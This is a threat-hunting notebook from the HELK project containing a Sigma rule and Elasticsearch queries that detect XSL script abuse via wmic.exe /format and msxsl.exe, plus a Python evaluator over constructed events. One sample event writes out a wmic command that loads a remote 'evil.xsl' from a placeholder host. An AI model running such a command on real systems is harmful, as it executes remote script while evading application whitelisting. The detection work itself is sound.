mirror of https://github.com/infosecn1nja/HELK.git
133 lines
3.4 KiB
Plaintext
{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# XSL Script Processing\n",
    "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. This rule detects when adversaries abuse that functionality, via `wmic.exe /format` or `msxsl.exe`, to execute arbitrary script embedded in an XSL file while potentially bypassing application whitelisting defenses."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Rule Content\n",
    "```\n",
    "- title: XSL Script Processing\n",
    "  id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\n",
    "  status: experimental\n",
    "  description: Extensible Stylesheet Language (XSL) files are commonly used to describe\n",
    "    the processing and rendering of data within XML files, rule detects when adversaries\n",
    "    abuse this functionality to execute arbitrary files while potentially bypassing\n",
    "    application whitelisting defenses\n",
    "  author: Timur Zinniatullin, oscd.community\n",
    "  date: 2019/10/21\n",
    "  modified: 2019/11/04\n",
    "  references:\n",
    "  - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.yaml\n",
    "  logsource:\n",
    "    category: process_creation\n",
    "    product: windows\n",
    "    service: null\n",
    "  detection:\n",
    "    selection:\n",
    "    - Image|endswith: \\wmic.exe\n",
    "      CommandLine|contains: /format\n",
    "    - Image|endswith: \\msxsl.exe\n",
    "    condition: selection\n",
    "  falsepositives:\n",
    "  - WMIC.exe FP depend on scripts and administrative methods used in the monitored\n",
    "    environment\n",
    "  - msxsl.exe is not installed by default so unlikely.\n",
    "  level: medium\n",
    "  tags:\n",
    "  - attack.execution\n",
    "  - attack.t1220\n",
    "\n",
    "```"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Querying Elasticsearch"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Import Libraries"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "from elasticsearch import Elasticsearch\n",
    "from elasticsearch_dsl import Search\n",
    "import pandas as pd"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Initialize Elasticsearch client"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "es = Elasticsearch(['http://helk-elasticsearch:9200'])\n",
    "searchContext = Search(using=es, index='logs-*', doc_type='doc')"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Run Elasticsearch Query"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "# Raw string: Lucene must receive \\\\ for a literal path separator and \\/ for an escaped slash\n",
    "s = searchContext.query('query_string', query=r'((process_path.keyword:*\\\\wmic.exe AND process_command_line.keyword:*\\/format*) OR process_path.keyword:*\\\\msxsl.exe)')\n",
    "response = s.execute()\n",
    "df = pd.DataFrame()  # empty frame so the results cell still runs if the query fails\n",
    "if response.success():\n",
    "    df = pd.DataFrame((d.to_dict() for d in s.scan()))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Show Results"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "df.head()"
   ]
  }
 ],
 "metadata": {},
 "nbformat": 4,
 "nbformat_minor": 4
}
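The selection in the rule above has two alternatives: wmic.exe with /format on its command line, or any execution of msxsl.exe. The following added example (not code from the HELK notebook or the Sigma rule) evaluates that selection locally over constructed process_creation events, and builds the same selection as a structured Elasticsearch bool/wildcard query so the backslash escaping that the notebook's query_string needs is handled explicitly. The HELK field names process_path and process_command_line are taken from the notebook's query; the sample events are constructed for the example.

```python
"""Evaluate the XSL Script Processing selection locally and build the
equivalent Elasticsearch query.

Added example; not code from the HELK notebook or the Sigma rule.
Assumptions: the HELK field names process_path / process_command_line used
by the notebook's query_string, and the constructed sample events below.
"""

# The rule's two alternatives:
#   (Image endswith \wmic.exe AND CommandLine contains /format)
#   OR Image endswith \msxsl.exe
WMIC_SUFFIX = "\\wmic.exe"
MSXSL_SUFFIX = "\\msxsl.exe"
FORMAT_SWITCH = "/format"


def matches_xsl_rule(event: dict) -> bool:
    """True when a process_creation event satisfies the Sigma selection.

    Sigma string modifiers are case-insensitive, so both sides are
    lower-cased. A missing field is treated as an empty string.
    """
    image = str(event.get("process_path", "")).lower()
    cmdline = str(event.get("process_command_line", "")).lower()
    wmic_format = image.endswith(WMIC_SUFFIX) and FORMAT_SWITCH in cmdline
    msxsl = image.endswith(MSXSL_SUFFIX)
    return wmic_format or msxsl


def find_matches(events: list) -> list:
    """Return the events the rule would alert on, in input order."""
    return [e for e in events if matches_xsl_rule(e)]


def es_bool_query() -> dict:
    """The same selection as a bool/wildcard query (assumed field names).

    In a wildcard value a backslash escapes the next character, so a
    literal path separator is sent as two backslashes. Wildcard on a
    keyword field is case-sensitive unless the mapping normalises case,
    which differs from Sigma's case-insensitive semantics.
    """
    return {
        "query": {
            "bool": {
                "should": [
                    {"bool": {"filter": [
                        {"wildcard": {"process_path.keyword": {"value": "*\\" + WMIC_SUFFIX}}},
                        {"wildcard": {"process_command_line.keyword": {"value": "*" + FORMAT_SWITCH + "*"}}},
                    ]}},
                    {"wildcard": {"process_path.keyword": {"value": "*\\" + MSXSL_SUFFIX}}},
                ],
                "minimum_should_match": 1,
            }
        }
    }


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Atomic-style abuse: wmic loading a remote XSL via /FORMAT -> match
    {"process_path": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "process_command_line": "wmic process list /FORMAT:\"http://example.invalid/evil.xsl\""},
    # Ordinary wmic inventory command, no /format -> no match
    {"process_path": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "process_command_line": "wmic os get caption"},
    # msxsl.exe matches regardless of its arguments
    {"process_path": "C:\\Tools\\msxsl.exe",
     "process_command_line": "msxsl.exe data.xml script.xsl"},
    # Image suffix check stops a command line that merely mentions wmic.exe
    {"process_path": "C:\\Windows\\System32\\notepad.exe",
     "process_command_line": "notepad.exe wmic.exe /format"},
    # Event missing the command line field: handled, no match
    {"process_path": "C:\\Windows\\System32\\cmd.exe"},
]

if __name__ == "__main__":
    for hit in find_matches(SAMPLE_EVENTS):
        print(hit["process_path"], "|", hit.get("process_command_line", "<none>"))
```

Running the block reports the first and third sample events. Because both alternatives key on the image path suffix, a renamed copy of wmic.exe or msxsl.exe does not match this selection; that is a property of the rule as written, not of this evaluator.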